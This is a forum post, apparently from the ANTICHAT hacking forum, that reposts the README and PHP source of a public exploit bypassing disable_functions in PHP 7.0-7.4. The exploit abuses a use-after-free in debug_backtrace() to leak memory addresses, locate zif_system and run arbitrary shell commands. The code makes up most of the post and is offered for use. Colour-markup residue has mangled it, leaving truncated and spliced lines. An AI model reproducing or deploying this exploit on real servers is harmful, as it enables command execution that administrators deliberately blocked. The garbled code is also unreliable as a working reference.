Форум АНТИЧАТ - Показать сообщение отдельно

PHP 7.0-7.4 disable_functions bypass

https://github.com/mm0r1/exploits/tr...cktrace-bypass

.SpoilerTarget" type="button">Spoiler: README.md
PHP 7.0-7.4 disable_functions bypass

This exploit uses a two year old bug in debug_backtrace() function. We can trick it into returning a reference to a variable that has been destroyed, causing a use-after-free vulnerability. The PoC was tested on various php builds for Debian/Ubuntu/CentOS/FreeBSD with cli/fpm/apache2 server APIs and found to work reliably.

Targets
7.0 - all versions to date
7.1 - all versions to date
7.2 - all versions to date
7.3 - all versions to date
7.4 - all versions to date
.SpoilerTarget" type="button">Spoiler: exploit.php
PHP код:

		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$backtrace[/COLOR][COLOR="#007700"]= (new[/COLOR][COLOR="#0000BB"]Exception[/COLOR][COLOR="#007700"])->[/COLOR][COLOR="#0000BB"]getTrace[/COLOR][COLOR="#007700"]();[/COLOR][COLOR="#FF8000"]# ;)
[/COLOR][COLOR="#007700"]if(!isset([/COLOR][COLOR="#0000BB"]$backtrace[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'args'[/COLOR][COLOR="#007700"]])) {[/COLOR][COLOR="#FF8000"]# PHP >= 7.4
[/COLOR][COLOR="#0000BB"]$backtrace[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]debug_backtrace[/COLOR][COLOR="#007700"]();
           }
       }
   }

   class[/COLOR][COLOR="#0000BB"]Helper[/COLOR][COLOR="#007700"]{
       public[/COLOR][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$b[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$c[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$d[/COLOR][COLOR="#007700"];
   }

   function[/COLOR][COLOR="#0000BB"]str2ptr[/COLOR][COLOR="#007700"](&[/COLOR][COLOR="#0000BB"]$str[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$p[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$address[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];
       for([/COLOR][COLOR="#0000BB"]$j[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$j[/COLOR][COLOR="#007700"]>=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$j[/COLOR][COLOR="#007700"]--) {
[/COLOR][COLOR="#0000BB"]$address[/COLOR][COLOR="#007700"]>=[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"];
       }
       return[/COLOR][COLOR="#0000BB"]$out[/COLOR][COLOR="#007700"];
   }

   function[/COLOR][COLOR="#0000BB"]write[/COLOR][COLOR="#007700"](&[/COLOR][COLOR="#0000BB"]$str[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$p[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$v[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$n[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];
       for([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]>=[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"];
       }
   }

   function[/COLOR][COLOR="#0000BB"]leak[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$addr[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$p[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]) {
       global[/COLOR][COLOR="#0000BB"]$abc[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$helper[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$abc[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0x68[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$addr[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]$p[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]0x10[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$leak[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$helper[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]);
       if([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]) {[/COLOR][COLOR="#0000BB"]$leak[/COLOR][COLOR="#007700"]%=[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]$leak[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]$base[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]$leak[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]$base[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$arg[/COLOR][COLOR="#007700"];
   }

   if([/COLOR][COLOR="#0000BB"]stristr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]PHP_OS[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'WIN'[/COLOR][COLOR="#007700"])) {
       die([/COLOR][COLOR="#DD0000"]'This PoC is for *nix systems only.'[/COLOR][COLOR="#007700"]);
   }

[/COLOR][COLOR="#0000BB"]$n_alloc[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#FF8000"]# increase this value if UAF fails
[/COLOR][COLOR="#0000BB"]$contiguous[/COLOR][COLOR="#007700"]= [];
   for([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]b[/COLOR][COLOR="#007700"]= function ([/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"]) { };

   if([/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$abc[/COLOR][COLOR="#007700"]) ==[/COLOR][COLOR="#0000BB"]79[/COLOR][COLOR="#007700"]||[/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$abc[/COLOR][COLOR="#007700"]) ==[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) {
       die([/COLOR][COLOR="#DD0000"]"UAF failed"[/COLOR][COLOR="#007700"]);
   }

[/COLOR][COLOR="#FF8000"]# leaks
[/COLOR][COLOR="#0000BB"]$closure_handlers[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str2ptr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$abc[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$php_heap[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str2ptr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$abc[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0x58[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$abc_addr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$php_heap[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]0xc8[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#FF8000"]# fake value
[/COLOR][COLOR="#0000BB"]write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$abc[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0x60[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$abc[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0x70[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#FF8000"]# fake reference
[/COLOR][COLOR="#0000BB"]write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$abc[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0x10[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$abc_addr[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]0x60[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$abc[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0x18[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0xa[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$closure_obj[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str2ptr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$abc[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0x20[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$binary_leak[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]leak[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$closure_handlers[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]);
   if(!([/COLOR][COLOR="#0000BB"]$base[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]get_binary_base[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$binary_leak[/COLOR][COLOR="#007700"]))) {
       die([/COLOR][COLOR="#DD0000"]"Couldn't determine binary base address"[/COLOR][COLOR="#007700"]);
   }

   if(!([/COLOR][COLOR="#0000BB"]$elf[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]parse_elf[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$base[/COLOR][COLOR="#007700"]))) {
       die([/COLOR][COLOR="#DD0000"]"Couldn't parse ELF header"[/COLOR][COLOR="#007700"]);
   }

   if(!([/COLOR][COLOR="#0000BB"]$basic_funcs[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]get_basic_funcs[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$base[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$elf[/COLOR][COLOR="#007700"]))) {
       die([/COLOR][COLOR="#DD0000"]"Couldn't get basic_functions address"[/COLOR][COLOR="#007700"]);
   }

   if(!([/COLOR][COLOR="#0000BB"]$zif_system[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]get_system[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$basic_funcs[/COLOR][COLOR="#007700"]))) {
       die([/COLOR][COLOR="#DD0000"]"Couldn't get zif_system address"[/COLOR][COLOR="#007700"]);
   }

[/COLOR][COLOR="#FF8000"]# fake closure object
[/COLOR][COLOR="#0000BB"]$fake_obj_offset[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0xd0[/COLOR][COLOR="#007700"];
   for([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]b[/COLOR][COLOR="#007700"])([/COLOR][COLOR="#0000BB"]$cmd[/COLOR][COLOR="#007700"]);
   exit();
}
[/COLOR][/COLOR]